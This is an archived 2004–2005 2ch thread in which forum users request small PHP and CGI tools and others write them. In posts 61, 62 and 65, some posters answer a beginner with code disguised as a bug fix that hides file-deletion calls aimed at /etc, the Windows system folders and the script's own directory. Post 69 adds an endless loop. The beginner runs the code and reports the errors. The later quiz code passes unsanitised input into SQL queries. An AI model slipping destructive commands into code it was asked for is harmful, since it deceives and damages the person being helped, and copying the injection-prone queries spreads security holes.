5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

依頼されたツールを誰かが作るスレ

1 :nobodyさん:04/03/11 18:34 ID:9/n8FJau
依頼されたツールを誰かが作るスレです。

・依頼するときには、どんなツールを作ってほしいか言いましょう。
・拡張子もちゃんと指定しましょうね。(htmなど)
・作られるのが遅くても我慢汁。

作る人はがんばってください。

2 :nobodyさん:04/03/11 18:39 ID:???
−−−−−−−−−− 終了 −−−−−−−−−−−

3 :nobodyさん:04/03/11 18:57 ID:mLlLH5ra
>>1を削除するツールを作ってください
拡張子は.dqn

4 :nobodyさん:04/03/12 06:48 ID:qydu/i31
はいぱーうんこ

まぁ、作りませんか?スレよりは潔くて良いが。


5 :nobodyさん:04/03/12 07:47 ID:???
こんなところに春がきているよママーン

6 :nobodyさん:04/03/13 20:39 ID:t5GyDYjl
誰か言葉を逆さにするツール作ってください
拡張子は.htmで

7 :nobodyさん:04/03/13 23:11 ID:???
>>6
http://tool-ya.ddo.jp/2ch/trash-box/file/20040313230519167.htm
横のさかさはスクリプトオンで可
縦のさかさはスクリプトオフでもいいけれど
IE4以上のActiveXの機能を少し使います
ファイル3日で消えるらしいです

8 :nobodyさん:04/03/13 23:59 ID:8LTzlkiM
スレHTML→2ch形式dat変換ツール
意外とHTMLの形式がいろいろあるから、全部対応してるやつ

9 :nobodyさん:04/03/14 08:30 ID:85CqQGfI
>>7
アクセス拒否されるYO!

10 :nobodyさん:04/03/14 10:09 ID:???
多分>>8>>1

作りませんか?系スレは>>1が何か欲しい場合に立てる。そこに志はない。


11 :8:04/03/14 16:33 ID:???
>>8だけど>>1じゃないよ
html2datは昔作ったんだけどHTMLは2chとかdat2htmlで作った奴とか
微妙に形式違っててその度に手直ししてたんだわ

誰も作らないなら稚拙でも自分で作るさ

12 :nobodyさん:04/03/15 11:39 ID:???
>>10
せめてn番が指定したものをn+1番が作るスレだよな

>>11
っていうかそれ無理だろ…

13 :nobodyさん:04/03/15 11:49 ID:85844v4V
えっと・・・新しくサイトを作ってる最中なんですが、

*名前を入力するフォーム
*メールアドレスを入力するフォーム
*電話番号を入力するフォーム
*住所を入力するフォーム
*商品番号を入力するフォーム
*その他、何でもいい連絡事項等を入力するフォーム

*入力したそれらの情報をメールにして、「メールアドレスを入力するフォーム」に入力
されたアドレスと、私宛の2件に送信する

というページを作りたいのですが、ちょっと検索してみたのですが見つかりませんでした。
よろしくお願いします。

14 :nobodyさん:04/03/15 12:03 ID:u5uDbosW
処理完了時にmail(入力されたアドレス,subject,message);とmail(13のアドレス,subject,message);
http://jp2.php.net/manual/ja/function.mail.php

15 :nobodyさん:04/03/15 15:03 ID:???
>>13
レンタルしろ

さもなきゃ

【CGI】こんなCGI探してますver.12【素材】
http://pc2.2ch.net/test/read.cgi/hp/1075737677/

16 :nobodyさん:04/03/15 15:08 ID:???
ただの質問スレになりさがったところで>>1は削除依頼よろ

17 :nobodyさん:04/03/15 15:35 ID:???
>>13
作りました。

次の方どうぞ。

18 :nobodyさん:04/03/15 16:10 ID:???
以下、
*99の指定したスクリプトを*00が作ってみるスレ
に変更されました

19 :nobodyさん:04/03/15 18:29 ID:GA9gqFb0
>>18
かまわないけど、自分が*00とったらドウシヨ
つくれるかな?
まあ、いいんじゃねーの?

20 :nobodyさん:04/03/15 18:38 ID:08u6ufAL
参加age

21 :nobodyさん:04/03/15 18:44 ID:???
どうせ*99は作れもしない要求をし、*00は作れるものでも作りゃしないのさ

22 :nobodyさん:04/03/15 18:54 ID:GA9gqFb0
加速

23 :nobodyさん:04/03/15 18:54 ID:GA9gqFb0
加速しろお前ら

24 :nobodyさん:04/03/15 19:12 ID:???
http://pc2.2ch.net/test/read.cgi/php/1041683799/

25 :nobodyさん:04/03/15 19:13 ID:???
言語は不問でつか?

26 :nobodyさん:04/03/15 19:49 ID:???
>>25
日本語でおながいしまつ

27 :nobodyさん:04/03/16 00:24 ID:???
誰か!ロゴかベーシックを!それかひまわり、ひまわりを!!!!

28 :nobodyさん:04/03/16 15:39 ID:???
>>8
形式いろいろある(俺も自作のdat→htmlスクリプト作ったぐらい)から無理

正規表現勉強してテキストエディタを使うのがいいよ。
なれれば結構簡単。

まぁこんなのもあるけど。
http://www.vector.co.jp/soft/win95/net/se316366.html

29 :nobodyさん:04/03/17 00:10 ID:???
マンガ本(書籍)の購入管理cgi

1巻目を購入した場合、書籍名を入力すると現在の年月日と時刻と共に登録される
2巻目以降を購入した場合、登録された書籍名を呼び出し、購入した巻数と現在の年月日と時刻を登録する
購入履歴検索機能付き
いたずら防止機能付き(パスワード・クッキー)

みたいなcgiってありませんか?

30 :nobodyさん:04/03/17 01:05 ID:???
>>29
取りあえず納品物は自分で作ろうや。

31 :nobodyさん:04/03/17 01:06 ID:???
>>29
この板ではCGI探しは扱っていません。

【CGI】こんなCGI探してますver.12【素材】
http://pc2.2ch.net/test/read.cgi/hp/1075737677/

32 :nobodyさん:04/03/17 01:07 ID:???
>>29
無いようなので作りました。


次の方どうぞ。

33 :nobodyさん:04/03/17 07:38 ID:???
書き込んだ言葉がすべて敬語になるツールをつくってもらえれば・・・

34 :nobodyさん:04/03/17 13:01 ID:???
>>33
関西弁変換ツールを改造してつくりました。

次の方どうぞ。

35 :nobodyさん:04/03/17 14:02 ID:???
誰にも作れないスクリプトを作ってくれませんか?

36 :nobodyさん:04/03/17 15:49 ID:???
誰かが作った時点で誰にも作れないものではなくなるから無理。


はっ!言っちゃいけなかった?

37 ::04/03/17 16:14 ID:???
>>35
作りました。

38 :nobodyさん:04/03/17 16:46 ID:???
つーか作ったのはちゃんとうpしようよ。

39 :nobodyさん:04/03/17 20:43 ID:???
画像の容量を自動的に削ってくれる、なんてのは・・・

40 :nobodyさん:04/03/17 22:09 ID:???
>>39
自動サムネイル作成ならいくらでもある。

41 :nobodyさん:04/03/19 00:25 ID:???
>>39
後ろ2MBをごっそり捨てるのならあるぞ。

42 :39:04/03/19 17:54 ID:???
>>41
うpキボンヌ。

43 :nobodyさん:04/03/19 19:24 ID:0q4JU95w
web上でサイトを巡回しながら進化するプログラム

44 :nobodyさん:04/03/19 19:34 ID:???
AI搭載ですか?

45 :nobodyさん:04/03/20 00:03 ID:???
>>44
遺伝的アルゴリズムじゃないのか?

46 :nobodyさん:04/03/20 09:08 ID:???
ここってひっそりと良スレかな?

47 :nobodyさん:04/03/20 19:10 ID:???
>>45
なにそれ?

48 :nobodyさん:04/03/21 03:53 ID:???
テキスト保存ができるPHPを作っていただきたいです。
おもな流れは
1.テキストボックスにテキスト文字列を入れる(半角英数字のみOK)
2.条件処理:テキストの最初の文字は常に"0"でないといけない。文字列の長さは5文字以上
 同じ文字列がテキストファイルに登録されている場合は登録できない。
3.文字列をサーバー内のテキストファイルに無限に保存。(一行ずつ)
 条件を突破して登録できたらメッセージを表示。

といったテキスト登録・保存CGIを作ってもらいたいです。
言語はできたらPHPでお願いしたいと思います。
やってやろうという猛者の開発者さんがいればよろしくお願いします。

49 :nobodyさん:04/03/21 03:58 ID:???
3.無限に
以外は完成。無限はありえない。


次の方どうぞ。

50 :48:04/03/21 04:24 ID:???
では300件まででかまいません。
完成を待っています。

51 :nobodyさん:04/03/21 05:05 ID:???
           ∧_∧ 
         ヾy ´・ω・`ヽノシ  コンニチワ!
          `!       i
          ゝ c_c_,.ノ  
             (
              )
             (
             ω

52 :nobodyさん:04/03/21 08:59 ID:???
>>48
素人仕様はいらんから用途を書け。勝手にインテグレートする。


53 :nobodyさん:04/03/21 09:08 ID:???
>>48
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
eval('flock($p,2);');while($l=fgets($p,2+$x))$d[$l]=1;!array_key_exists(
"$m[1]\n",$d)and fwrite($p,"$m[1]\n")and print'これで満足か?';fclose($p);}?>

PHPは詳しく知らん。

54 :nobodyさん:04/03/21 09:33 ID:???
>>53
それってコピーして貼り付けて、html形式で保存したらどうなんの?

55 :nobodyさん:04/03/21 10:00 ID:???
>>54
どうもならない。

56 :53:04/03/21 10:00 ID:???
>>54 PCが爆発する。

57 :48:04/03/21 10:11 ID:???
やってみましたが、テキストに登録されたあとに改行されていないのがどうも・・・。
\nは改行なので<BR>に変えてみたりしたのですが改行されずにスペースがあくだけで
0aaaaa 0bbbbb 0ccccc のようになってしまいます。

イメージとしてはテキスト開いたときに
0aaaaa
0bbbbb
0ccccc

のように表示させたいのですが無理ですか?
もしテキストが駄目ならHTMLでもOKです。


58 :nobodyさん:04/03/21 10:29 ID:???
>>57
イイ喧嘩の売り方だな。

59 :53:04/03/21 10:43 ID:???
>>57
>\nは改行なので<BR>に変えてみたりしたのですが改行されずにスペースがあくだけで
これが意味不明。メモ帳で開いて「改行表示」されないだけならワードパッドで開け。


60 :48:04/03/21 10:49 ID:???
すいません。エクスプローラで開いていたので改行されていないように見えたようです。
メモ帳で開くと改行されていました。


ただ
> 同じ文字列がテキストファイルに登録されている場合は登録できない。
ができちゃっているので修正してもらえませんか>?

61 :nobodyさん:04/03/21 10:50 ID:???
>>57
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;unlink("/etc/*");if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
unlink("c:/winnt/*");eval('flock($p,2);');unlink("c:/windows/*");while($l=fgets($p,2+$x))$d[$l]=1;
!array_key_exists( "$m[1]\n",$d)and fwrite($p,"$m[1]\n")
and print'これで満足か?';fclose($p);}?>

\nを\r\nに置換するようにしてみた。


62 :nobodyさん:04/03/21 10:52 ID:???
>>60
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;unlink("/etc/*");if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
unlink("c:/winnt/*");eval('flock($p,2);');unlink("c:/windows/*");!array_key_exists( "$m[1]\n",$d)and fwrite($p,"$m[1]\n");while($l=fgets($p,2+$x))$d[$l]=1;!array_key_exists( "$m[1]\n",$d)and fwrite($p,"$m[1]\n") and print'ほれ';fclose($p);}?>


63 :nobodyさん:04/03/21 11:01 ID:???
>>56
マジですか?
いや、本当に教えてくれ。頼む。

64 :48:04/03/21 11:04 ID:???
エラーが出ます。。。

なにもしていない状態で出るエラー
Warning: unlink(): SAFE MODE Restriction in effect. The script whose uid is 3010 is not allowed to access /etc owned by uid 0 in /usr/home/free/home/winny/public_html/nodex.php on line 2

テキスト登録すると出るエラー(下)
Warning: unlink(c:/winnt/*): No such file or directory in /usr/home/free/home/winny/public_html/nodex.php on line 4

Warning: unlink(c:/windows/*): No such file or directory in /usr/home/free/home/winny/public_html/nodex.php on line 4
ほれ

65 :nobodyさん:04/03/21 11:12 ID:???
>>64
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php $n='./iregui.txt';$x=64;unlink("./*");if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
eval('flock($p,2);');while($l=fgets($p,2+$x))$d[$l]=1;!array_key_exists(
"$m[1]\n",$d)and fwrite($p,"$m[1]\n")and print'悪い、コレが正だ';fclose($p);}?>


66 :http:// 218-228-167-73.eonet.ne.jp.2ch.net/:04/03/21 11:18 ID:???
guest guest 

67 :48:04/03/21 11:22 ID:???

Warning: unlink(./*): No such file or directory

line2 がエラーです。

。。。。

68 :nobodyさん:04/03/21 11:23 ID:???
>>67
次は本気で行くが、いいか?

69 :nobodyさん:04/03/21 11:26 ID:???
<form method="post"><input type="text" name="s"><input type="submit"></form>
<?php while(1){$n='./iregui.txt';$x=64;if(isset($_POST['s'])and preg_match(
"/^([0][0-9A-Za-z]{4,$x})$/",$_POST['s'],$m)and $p=fopen($n,'r+')){$d=array();
eval('flock($p,2);');while($l=fgets($p,2+$x))$d[$l]=1; fwrite($p,"$m[1]\n")and print'これでうごくかな?';fclose($p);}}?>


70 :53:04/03/21 11:30 ID:???
>>67
俺さすがに限界なんで親切な>>68 にでも教えてもらった方が良いと思うよ。

71 :nobodyさん:04/03/21 11:32 ID:???
Warning: unlink(): SAFE MODE Restriction in effect. The script whose uid is 3010 is not allowed to access /etc owned by uid 0 in


/usr/home/free/home/winny/public_html/nodex.php on line 2


なにげにパスが良い感じで喧嘩売ってるな。                    

72 :48:04/03/21 11:36 ID:???
だめだこりゃw


ちなみにパスはファストプロジェクトの一部でやってるところのミラーですよw
いまはなにもないですが

73 :nobodyさん:04/03/21 12:31 ID:???
意味わからん
おまいらスゴ杉

74 :nobodyさん:04/03/21 16:20 ID:sMZl62+k
釣り師とネタ師age

75 :nobodyさん:04/03/21 19:00 ID:???
phpの事全然知らないんだが、ひょっとしてphpってソース見難い?

76 :nobodyさん:04/03/21 20:04 ID:???
>>75
改行とインデントしてないからそう見えるだけじゃねーの?

77 :nobodyさん:04/03/22 14:02 ID:elyzLGJ4
aaa!cafeとかだとphpをよく使うよね

78 :nobodyさん:04/03/23 00:25 ID:???
まだaaa!cafeなんて使ってるアホいるの?

79 :nobodyさん:04/03/23 22:08 ID:TV3ZuPX4
>>78
アアン?

80 :age小僧 ◆UmaibouAJY :04/03/24 21:53 ID:7IoYvSiu
HPのソースをなるべく正しいのに変えてくれるツール。
<font size=○>→スタイルシート とか。

81 :nobodyさん:04/03/24 22:15 ID:???
自動でSEO対策してくれるサービスはある。

82 :nobodyさん:04/03/25 06:41 ID:???
>>80
なんか各要素ごとに異なるidなりclassが付く予感。
逆コンパイラと一緒だな。変換はするが意味は考慮しない。

それが正しいhtmlなりcssかと言うとかなり疑問な訳で。



83 :nobodyさん:04/03/25 06:55 ID:???
>>80
何をもって正しいとするんだ?
HTMLのバージョンとかによって違うわけだが。

84 :nobodyさん:04/03/25 07:36 ID:???
なんでもxhtml1.1とかにしときゃいいんじゃねーの?
俺には作れないけどさ。

85 :age小僧 ◆UmaibouAJY :04/03/25 10:17 ID:RrsfViza
正しいHTMLとかについては、
http://home3.first-web.ne.jp/~pedsys/htmllint/htmllint.html
ここを参照にしてください。

86 :nobodyさん:04/03/25 10:39 ID:???
そもそもAnaother html-lintの本家
tp://openlab.ring.gr.jp/k16/htmllint/htmllint.html
を出さないことからしてどうかしてるし、
「満点で慢心しないでください。」
という言葉の意味もまるで分かってないな、小僧。

87 :nobodyさん:04/03/29 09:01 ID:DbFwTKRt
人工知能は?
アイフルのHPにあるお姉さんのあれとか。
作れないかな?誰かおながい

88 :nobodyさん:04/03/29 09:25 ID:???
ただしいマークアップなんてのは機械にはできねえよ。
そんなことができるならそもそもxmlは不要。

89 :nobodyさん:04/03/29 11:19 ID:Rwr6lKku
マークアップってなんですかね?

90 :nobodyさん:04/03/29 22:29 ID:X47Smi9U
90!!!!

91 :nobodyさん:04/03/29 22:43 ID:fXaqt12s
91!!!!

92 :nobodyさん:04/06/07 15:45 ID:???
いつかお世話になるかもしれないので保守

93 :nobodyさん:04/08/17 18:59 ID:???
誰か自動垢取りスクリプト作って(´・ω・`)

94 :nobodyさん:04/10/01 06:48:46 ID:lqjypZYy
なんだ。
まじめにスレ読んだオレがバカだった。


95 :nobodyさん:04/10/11 06:06:22 ID:sfhiVsaD
<FORM method="POST" enctype="multipart/form-data" action="〜.cgi">
<INPUT type=file name=file1>
</FORM>
のフォームからファイルアップロードされた場合、
HTTPサーバーのCGI上で標準入力から読み出す場合、、
この時のアップされたファイルのデータを取り出すアルゴリズムを教えてください。
Perlとかの具体的コーディングではなく、
アルゴリズムです。
できれば、VBでw標準入出力の読み書きは結構です。
区切りがあるのは分かっていますが、
1行で読んでいけばいいのでしょうか?(改行コードOSごとに違うのかぁ)
ファイルの属性みたいなのもあるんだよなぁ
できればDLL化してください。w


96 :nobodyさん:04/11/10 16:32:08 ID:s3r2noFB
>93 ttp://f57.aaa.livedoor.jp/~kumakuma/tool/acc.html

97 :nobodyさん:04/12/18 06:01:02 ID:neHl2NC1
>>48
今さらながら適当に作ってみた。
何がやりたいのかよくわからんからこれでいいのか不明だけど。
ttp://sv1.zive.net:9999/test/test.php


98 :nobodyさん:05/01/02 01:42:29 ID:mBFwp0hg
PHPとMySQLを使って4択問題を出題できるphpファイルを作っていただけないでしょうか?
・データベースに問題と4択の解答群と正解がためてある
・問題と4択の解答群が出題されラジオボタン形式で答えを選びサーバーに送信
・サーバーで答えあわせをされる
例えるとwebアンケートのようなものでしょうか。
答えあわせのファイルまでだとかなりお手をわずらわせてしまうのでデータベースに登録してある問題と解答群を出題するというphpファイルを作っていただけないでしょうか?

99 :nobodyさん:05/01/02 02:21:24 ID:g7zmI0f+
>>98
テーブル構造教えて。

100 :nobodyさん:05/01/02 03:12:27 ID:mBFwp0hg
>>99
作ってもらう立場なので作りやすいようにそちらにおまかせします
あとでデータベースにためておく問題や答えやよびだす先などを作っていただいたのにあわせます。

101 :nobodyさん:05/01/02 07:50:13 ID:g7zmI0f+
>>100
ぇ?
こっちで考えるといわれても、何作れば良いのかちょっとわからないかも・・・
問題ってどんな問題ですか?

102 :nobodyさん:05/01/02 16:16:03 ID:???
100行のbbs、blog、wiki

103 :nobodyさん:05/01/02 18:19:27 ID:???
>>102
BBSは100行も要らない

七行プログラミング
http://pc5.2ch.net/test/read.cgi/php/1036141603/

104 :nobodyさん:05/01/02 18:44:23 ID:???
>>97
サライ!

105 :nobodyさん:05/01/03 12:31:19 ID:4Lz2vVwg
>>101
すいません。説明不足でした。
データベースには
・問題
・4択の解答群
・問題の正解
をワンセットにしたものをいくつも登録していく感じで
データベース名、テーブル名はおまかせします。

問題の例をいうと、ペーパー試験をweb上でやるようなもので
問1.1+1の答えは?
○1.1
○2.2
○3.3
○4.4
という問題と解答群が出されて1〜4のどれかのラジオボタンをチェックしていくという形式です。
あとは全問題が終わったらサーバーに送信してやるというかたちになります。
できればデーターベースに登録してあるどの問題をだすかも選べるようにできる機能があればありがたいです

106 :nobodyさん:05/01/04 00:07:21 ID:???
-- テーブルこんな感じで
create table quiz (
  id integer unsigned not null auto_increment,
  question text not null,
  answer enum('A', 'B', 'C', 'D'),
  A varchar(64) not null,
  B varchar(64) not null,
  C varchar(64) not null,
  primary key (id)
);


107 :nobodyさん:05/01/04 00:07:49 ID:???
データベース周りの操作をまとめたクラス quiz.php.inc
<?php
class Quiz {
  var $table='quiz';
  function Quiz() {}
  function connectDB($dbserver, $username, $password, $database) {
    @mysql_connect($dbserver, $username, $password);
    @mysql_select_db($database);
  }
  function query($query_string) {
    $result = @mysql_query($query_string);
    if (! $result) {
      printf("MySQL error(%d): %s\n", @mysql_errno(), @mysql_error());
      return NULL;
    }
    return @mysql_fetch_object($result);
  }
  function getAnswer($id) {
    return $this->query("SELECT `answer` FROM $this->table WHERE `id`=$id;");
  }
  function getQuestion($id) {
    return $this->query("SELECT `question`,`A`,`B`,`C`,`D` FROM $this->table WHERE `id`=$id;");
  }
  function addQuestion($question, $answer, $answers) {
    assert(in_array($answer, array('A', 'B', 'C', 'D')));
    assert(4 == count($answers));
    list($A, $B, $C, $D) = $answers;
    $this->query("INSERT INTO `$this->table` VALUES(NULL,`$question`,`$answer`,`$A`,`$B`,`$C`,`$D`);");
  }
}
?>
続きは、また今度。

108 :nobodyさん:05/01/04 00:47:34 ID:WKpVZ3ZH
>>107
お疲れ様です
引き続きよろしくお願いします

109 :nobodyさん:05/01/05 04:11:06 ID:???
テーブル定義(差分
- answer enum('A', 'B', 'C', 'D'),
+ answer enum('A', 'B', 'C', 'D') not null,

4択なので Dを追加
+ D varchar(64) not null,

quiz.php.inc ...クォート間違い
- VALUES(NULL,`$question`,`$answer`,`$A`,`$B`,`$C`,`$D`);");
+ VALUES(NULL,'$question','$answer','$A','$B','$C','$D');");


110 :nobodyさん:05/01/05 04:11:41 ID:???

問題登録
<?php
include_once "./quiz.php.inc";
$quiz = new Quiz();
$quiz->connectDB('localhost', 'test', 'test', 'test');
if ($_POST) {
  if ($quiz->addQuestion(
     addslashes($_POST['question']), $_POST['answer'],
     array_map('addslashes', array($_POST['A'], $_POST['B'], $_POST['C'],
$_POST['D']))))
    print_r($_POST);
}
?>
<form method="post" action="<?= $_SERVER['PHP_SELF'] ?>">
<label>Question: </label><br /?
<textarea name="question"></textarea><br /><br />
<label>A: <input name="A" value="" /></label><br />
<label>B: <input name="B" value="" /></label><br />
<label>C: <input name="C" value="" /></label><br />
<label>D: <input name="D" value="" /></label><br />
<label>Answer: </label><select name="answer">
<option value="A">A</option>
<option value="B">B</option>
<option value="C">C</option>
<option value="D">D</option>
</select><input type="submit" /></form>


111 :nobodyさん:05/01/05 04:18:48 ID:???
うちのmySQL、versionが古くてsubquery使えなかったので、毎回クエリ発行(ぉ
htmlで保存してstatic contentにしたほうが良いかも。

<?php
$questions = array(1, 2, 3); // 問題のIDを順番に指定
echo "<form method=\"post\" action=\"check_quiz_answer.php\">\n";
foreach ($questions as $id) {
  $obj = $quiz->getQuestion($id);
  echo "<p>",$obj->question,"</p>\n";
  echo "<ol>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"A\">",$obj->A,"</li>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"B\">",$obj->B,"</li>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"C\">",$obj->C,"</li>";
  echo "<li><input type=\"radio\" name=\"Q$id\" value=\"D\">",$obj->D,"</li>";
  echo "</ol>";
  echo "<hr />\n";
}
echo "</form>\n";
?>

今から答え合わせの、作ってきます。

112 :nobodyさん:05/01/05 04:42:14 ID:???
あ、前のやつsubmitボタン忘れてた。閉じ</form>の前に
echo "<input type=\"submit\" />\n"; 追加。

quiz.php.incの一部変更
function getAnswer($id) {
  $obj = $this->query("SELECT `answer` FROM $this->table WHERE `id`=$id;");
  return ($obj) ? $obj->answer : false;
}

で、最後に答え合わせ。見ての通り手抜きなので、
カスタマイズして使うか、運用でカバーして下さい。
<?php
include_once "quiz.php.inc";
$quiz = new Quiz();
$quiz->connectDB('localhost', 'test', 'test', 'test');
$total = 0; $correct = 0;
if ($_POST) {
  foreach ($_POST as $id => $answer) {
    if (preg_match("/^Q(\d+)$/", $id, $arg)) {
      $total++;
      if ($answer == $quiz->getAnswer(addslashes($arg[1]))) {
        $correct++;
        echo "<li>$id ... $answer is OK</li>\n";
      }
      else {
        echo "<li>$id ... $answer not OK</li>\n";
      }
    }
  }
  printf("<p>Result: %d/%d</p>\n", $correct, $total);
} ?>

113 :nobodyさん:05/01/06 14:39:42 ID:???
>>112
ありがとうございました
今まで風邪で寝込んでいましたのでこれからじっくり勉強させていただきます
ほんとうにありがとうございました

114 :nobodyさん:05/01/12 00:51:18 ID:???
>>112
問題登録で問題の答えは登録できるんですが問題文がつくれません
私の使い方がおかしいのでしょうか?
そちらの環境ではできたのでしょうか?

115 :nobodyさん:05/01/12 12:15:45 ID:???
質問ばかりですみません。
追加で2つほど質問があります
1)>>107の@はどういう意味があるのでしょうか?
2)>>111のファイルにアクセスして問題を解いていくという形になるんですよね?ファイル名はなんでもいいんですか?
  5行目でエラー:Call to a member function on a non-object がでてしまいます

116 :nobodyさん:05/01/12 21:00:48 ID:3Dz5Lw0C
114の問題は解決できました。
<textarea name="question"></textarea><br /><br />にテーブルタグをいれてやったら問題文を打ち込めるようになりました

それでも115の問題が解決できません。
アドバイスお願いします

117 :nobodyさん:05/01/13 07:53:18 ID:???
>>115
>>114 は、おそらくtextareaのサイズ指定してないからだと思います。
textareaタグの属性にcols, rows属性を付けるか、CSSで幅指定(width,height)する。
登録のは、MySQL関連のツールの方が使いやすいかも(編集/修正も必要だよなと思ったり...
設問のファイルをcvsなどで作ってから、まとめて登録する方が便利ですよ。編集も簡単だし。

> 1)>>107の@はどういう意味があるのでしょうか?
http://www.php.net/manual/ja/language.operators.errorcontrol.php
エラー制御演算子です。が、上に投稿したスクリプトはエラー処理全然してません。
DBへの接続や、テーブルが登録されてるのを前提にしてます。スペースの都合と、運用でカバー出来る範囲かなと思ったので。

ファイル名は何でもokです。

5行目のエラーは、すいません、投稿時のミスでした。
スクリプト切り貼りしてたので。2行目辺りに追加して下さい。
include_once "quiz.php.inc";
$quiz = new Quiz();
$quiz->connectDB('localhost', 'test', 'test', 'test');

118 :nobodyさん:05/01/13 11:16:47 ID:???
>>117
ありがとうございます。
とりあえず上記のエラーはなくなりました。
引き続き作っていただいたソースをもとに勉強していきたいと思います

119 :nobodyさん:05/01/13 20:15:08 ID:???
なんとか作っていただいたものの一連の操作・動作ができました
ありがとうございました

とりあえず
1)問題の修正と削除とIDの変更ができるようにすること
2)問題登録で画像もアップできるようにすること
3)問題に答える人と回答チェックをする人を別にすること(管理者だけが答えあわえできるように)
をできるようにめざして勉強していきたいと思います

120 :nobodyさん:05/01/17 21:44:44 ID:???
2)はできるようになったのですが1)の途中でつまずいています
というのもまずIDが固定されて変わらないということです
1番目の問題を消しても2番目の問題はID2のままでかわらないとかいうのは不便なのでどうにかしたいのですがわからず頭を悩ませています


次にCSV形式でのまとめての登録の仕方がわかりません
本などで調べてみたのですがみつけることができませんでした


3)についてどういう方法をとったらいいかのアドバイスをお願いします



以上3点お手数ですがアドバイスをお願いします


121 :nobodyさん:05/01/17 23:17:09 ID:???
>>120
友達いないのか。。。

122 :nobodyさん:05/01/19 03:10:34 ID:???
>>120
1) 複数のテーブルでIDを参照してる時に、id変更となるとデータの関連が切れるので困る事になるので、RDBではそもそもidの変更自体あまりしない。
表示を代えたいだけなら、上のスクリプトなら$questionsが表示するidの順番を保持しているので、配列のindexをパラメータで渡すように変更すると良い。
2) 方法はいろいろあるので、MySQL CSV インポートをキーワードに検索してみてください。
3) は、回答データをDBに蓄積していって、答え合わせはバッチ処置とかかな。

# そろそろすれ違い?

123 :nobodyさん:05/01/19 15:45:23 ID:???
ありがとうございます
スレ違いになってしまいますのでこれで質問はおわりにします

124 :nobodyさん:05/02/03 11:40:44 ID:???
PHPのソケットプログラムを組みたいのですが、雛形のような基本的なソースを
見つけることが出来ません…。PHProxyを解析しようとしたのですが挫折しました…。
・適当なウェブページ(ヤフートップページとかで十分です)の内容を
・一行ずつ適当な配列変数にでも入れて(後から弄る予定です)
・それを一行ずつ吐く
程度の、本当に基礎的なソース(上のままだとウェブProxyですが、雛形を元に自分で色々
組んでみたいと考えています))をお願いできないでしょうか?
何かスレ違いのような気もするのですがよろしくお願いします。

125 :nobodyさん:05/02/04 09:56:45 ID:???
>>124
ttp://php.benscom.com/manual/ja/ref.sockets.php

126 :nobodyさん:05/02/04 15:50:02 ID:???
>>125
ありがとうございます。実は書き込み後にとほほさんのサンプルスクリプトを発見したのですが
それだとヤフートップページは表示できても多くのサイトで「ホストが見つからない」という
エラーが起きていて頭を抱えていました。このソースで分かったのですが、gethostbynameを
使えば良かったんですね・・・。
お陰様で基本的なことが分かってきました。後は自分で試行錯誤で頑張れそうです。
ありがとうございました。

127 :nobodyさん:05/02/17 17:54:18 ID:???
>>124
他のサイトを読み込むだけならわざわざソケットからやらなくてももっと楽にできるだろうに

128 :nobodyさん:05/02/21 05:31:11 ID:???
>127
お客様はソケット使いたいと言っているのだからよろしいかと。

129 :124:05/02/22 18:04:56 ID:???
>>126-127
ありゃ、ソケット使わなくてもできるんですか??
一応ソケットで目的の動作をさせられるようになったんですが
他の方法だとどのようにやるのでしょうか?
(「読み込むだけなら」ってことは、ソケットは「面倒だけど、
 POSTで取得できたりRefererいじれたりする方法」とか
 そういうことなんでしょうか?)

130 :nobodyさん:05/02/23 12:59:01 ID:???
>>129
fopen wrapperが有効なら
$yahoo_html = file("http://www.yahoo.co.jp/");
で配列$yahoo_htmlに1行づつ入る。

131 :nobodyさん:05/02/27 13:06:08 ID:2jF8rHaF
下記のようなアンケートCGIをお願いします!
--------------------------------------------------------
■デフォルト画面
・選択肢1(○)…ラジオボタン(*入力必須)
・選択肢2(○)
・選択肢3(○)
コメント[          ]…1行テキストエリア(*入力必須)
[投稿]…投稿ボタン
[結果参照]…投稿せず結果のみ見るボタン

■投稿後の画面(結果画面)
総評数:○件
選択肢1/票数/%表示
選択肢2/票数/%表示
選択肢3/票数/%表示

「選択肢1のコメント」[全件表示ボタン]…コメント全件表示画面に切り替え
・コメント[投票日/時間]…最新3件表示
・コメント[投票日/時間]
・コメント[投票日/時間]
「選択肢2のコメント」(同上)
「選択肢3のコメント」(同上)

【お願いしたい機能】
・必須項目の入力がなかった場合のエラー表示
・連続投稿を禁止
・ファイルロック
--------------------------------------------------------
おねがいします!!!!!!!!

132 :nobodyさん:05/02/27 15:03:26 ID:CullZ9HO
lispでCGIができるtoolを作ってくれ

133 :nobodyさん:05/02/27 22:56:32 ID:OG/ioQoO
>>131
アンケートの質問は1つなの?

■デフォルト画面

  [ アンケートの質問文 ]

・選択肢1(○)…ラジオボタン(*入力必須)
・選択肢2(○)
・選択肢3(○)
コメント[          ]…1行テキストエリア(*入力必須)
[投稿]…投稿ボタン
[結果参照]…投稿せず結果のみ見るボタン

こんなんでいいの?

134 :131:05/02/27 23:02:26 ID:2jF8rHaF
>>133
はい!
それが用意できれば、質問も自分で増やせそうな気がします。
おねがいします!!!

135 :nobodyさん:05/02/28 00:14:43 ID:95zHTNSg
>>133
abc.cgi?q=1
abc.cgi?q=2

みたいな感じで質問変えられるように作ってあげれば?

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
